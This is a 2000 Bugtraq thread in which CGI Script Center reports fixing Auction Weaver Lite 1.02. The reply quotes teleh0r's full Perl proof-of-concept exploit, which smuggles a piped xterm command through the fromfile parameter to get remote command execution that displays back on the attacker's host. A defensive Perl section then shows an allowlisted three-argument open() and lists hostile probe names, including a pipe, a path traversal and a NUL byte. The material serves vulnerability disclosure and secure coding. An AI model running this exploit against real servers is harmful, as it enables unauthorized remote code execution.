Subject: Re: More problems with Auction Weaver & CGI Script Center.
From: CGI Script Center Support (supportCGISCRIPTCENTER.COM)
Date: Sat Sep 02 2000 - 18:49:02 CDT


Auction Weaver Lite 1.02 was opening files to be read without using the READ
"<" command, which allowed outside commands to be executed on UNIX platforms
using Xterm.

All files being opened for reading have now been updated.

> I have only been able to check the below exploit on the shareware
> version, but I strongly believe that the PRO version is exploitable
> as well.

No Professional version is yet available.

The below exploit should no longer be valid.

CGI Script Center Support
supportcgiscriptcenter.com

> -----Original Message-----
> From: teleh0r - [mailto:teleh0rdoglover.com]
> Sent: Wednesday, August 30, 2000 10:21 AM
> To: BUGTRAQSECURITYFOCUS.COM
> Cc: supportcgiscriptcenter.com
> Subject: More problems with Auction Weaver & CGI Script Center.
>
>
> CGI Script Center recently upgraded Auction Weaver 1.0 to
> 1.2 due to a security issue found and reported by Meliksah Ozoral.
>
> Today, I decided to take a look at Auction Weaver just to check
> if the issue and possible other security problems were now fixed.
>
> I guessed they had taken a *close* look at their scripts, considering
> the problems reported lately - but I guessed wrong...
>
> I have only been able to check the below exploit on the shareware
> version, but I strongly believe that the PRO version is exploitable
> as well.
>
> Or perhaps only those who pay get secure scripts? Maybe that would
> be a successful business policy? ;)
>
> CGI Script Center, _please_ contact me if you want help securing your
> scripts.
>
> Sincerely yours,
> teleh0r
>
> 8<---auctionweaver-exploit.pl------------------------------------
>
>
> #!/usr/bin/perl -w
>
> ## Auction Weaver 1.02 / Only confirmed with LITE
> ## - Proof of Concept exploit -
> ##
> ## CGI Script Center have just released an update
> ## of Auction Weaver due to security reasons - I
> ## suggest that you spend some more time securing
> ## it, and the other scripts - It is really needed.
> ##
> ## This exploit will spawn a xterm from $target
> ## to $attacker.
> ##
> ## This exploit will not work on hosts running
> ## Auction Weaver on NT, due to the xterm call.
> ##
> ## CGI Script Center, please contact me if you need
> ## help with securing your scripts...
> ##
> ## teleh0rdoglover.com / anno 2000
> ## http://teleh0r.cjb.net
>
> use strict; use Socket;
>
> if (@ARGV < 3) {
> print("Usage: $0 <target> <attacker> <dpy>\n");
> exit(1);
> }
>
> my($target,$attacker,$dpy,$length,$cgicode,
> $agent,$sploit,$iaddr,$paddr,$proto);
>
> ($target,$attacker,$dpy) = @ARGV;
>
> if ($dpy !~ /\d/) {
> print("dpy must be a number, probably 0\n");
> exit(1);
> }
>
> print("\nRemote host: $target\n");
> print("CGI-script: /cgi-bin/awl/auctionweaver.pl\n");
> print("Command: xterm -ut -display $attacker:$dpy\n\n");
>
> system("xhost + $target");
>
> $length = 138 + length($attacker.$dpy);
>
> # fromfile is the file-name parameter; the %7C (|) characters around the
> # command are what the script's two-argument open() treats as a pipe.
> $cgicode =
> "flag1=1&fromfile=%7Cxterm+-display+$attacker%3A$dpy%7C&placebid=1&catdir".
> "=cat1&username=teleh0r&password=ohbaby&bid=Ihavenomoney&nobiditem=1&sbutton=BID";
>
> $agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";
>
> # The path to auctionweaver.pl may of course need to be changed.
>
> $sploit=
> "POST /cgi-bin/awl/auctionweaver.pl HTTP/1.0
> Connection: close
> User-Agent: $agent
> Host: $target
> Content-type: application/x-www-form-urlencoded
> Content-length: $length
>
> $cgicode";
>
> $iaddr = inet_aton($target) || die("Error: $!\n");
> $paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n");
> $proto = getprotobyname('tcp') || die("Error: $!\n");
>
> socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
> connect(SOCKET, $paddr) || die("Error: $!\n");
> send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n");
> close(SOCKET);
>
> sleep(3);
> system("xhost - $target");
> print("\nAll done - hopefully you got the flying xterm!\n");
> exit(0);
>
>
> -----------------------------------------------------------------
>
>
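To make the vendor's fix concrete, here is an added example (not code from Auction Weaver, CGI Script Center or teleh0r's post) that puts the two-argument open() the reply describes next to a three-argument, allowlisted replacement. The function names, the item-file name, the temporary data directory and the probe strings are all assumptions made up for the demonstration.

```perl
#!/usr/bin/perl
# Added example, not code from Auction Weaver or from the original post.
# It shows the two-argument open() pattern the vendor reply describes next
# to a hardened three-argument version with an allowlist on the file name.
# All names (read_item_unsafe, read_item_safe, item1.dat) are made up here.
use strict;
use warnings;
use File::Spec;
use File::Temp qw(tempdir);

# Constructed data directory holding one legitimate auction item file.
my $datadir = tempdir(CLEANUP => 1);
my $sample  = File::Spec->catfile($datadir, 'item1.dat');
open(my $out, '>', $sample) or die "cannot create sample file: $!";
print $out "widget|10.00|someuser\n";
close($out);

# VULNERABLE PATTERN (what the advisory says 1.02 did): with two arguments,
# open() takes the mode from the value itself. A name such as "|cmd|" or
# "cmd|" therefore runs cmd through the shell instead of reading a file,
# and ">out" would truncate a file. Kept only for comparison and called
# below with a benign name only.
sub read_item_unsafe {
    my ($dir, $name) = @_;
    open(FILE, "$dir/$name") or return undef;   # mode decided by $name
    my @lines = <FILE>;
    close(FILE);
    return \@lines;
}

# HARDENED VERSION: validate the name against a strict allowlist, build the
# path ourselves, and use three-argument open() so '<' is always the mode.
sub read_item_safe {
    my ($dir, $name) = @_;
    # One short token of letters, digits, '_' or '-', optional ".dat" suffix.
    # This rejects '|', '/', '..', whitespace, NUL and a leading '>' or '<'.
    return (undef, 'invalid item name')
        unless defined $name && $name =~ /\A[A-Za-z0-9_-]{1,64}(?:\.dat)?\z/;
    my $path = File::Spec->catfile($dir, $name);
    open(my $fh, '<', $path) or return (undef, "open failed: $!");
    my @lines = <$fh>;
    close($fh);
    return (\@lines, undef);
}

# Constructed probe names: one legitimate, three hostile.
my @probes = (
    'item1.dat',                 # legitimate item
    '|cmd|',                     # the pipe form the advisory describes
    '../../../../etc/passwd',    # directory traversal
    "item1.dat\0.txt",           # NUL-byte truncation attempt
);

for my $name (@probes) {
    my ($lines, $err) = read_item_safe($datadir, $name);
    (my $shown = $name) =~ s/\0/\\0/g;   # make the NUL visible when printed
    if ($lines) {
        printf "ACCEPT %-28s -> %d line(s): %s", $shown, scalar(@$lines), $lines->[0];
    } else {
        printf "REJECT %-28s -> %s\n", $shown, $err;
    }
}

# The unsafe reader gives the same answer for the benign name; the difference
# is only in what each does with the hostile ones.
my $legacy = read_item_unsafe($datadir, 'item1.dat');
print "legacy reader, benign name: ", scalar(@$legacy), " line(s)\n";
```

Running the script prints one ACCEPT line for item1.dat and three REJECT lines. Two things worth noting for anyone auditing similar CGI scripts: the allowlist is the real control (three-argument open() alone still lets "../" through), and running the script under perl -T would have turned the original bug into a hard failure, since a pipe open on tainted data dies with "Insecure dependency in piped open" rather than spawning the command.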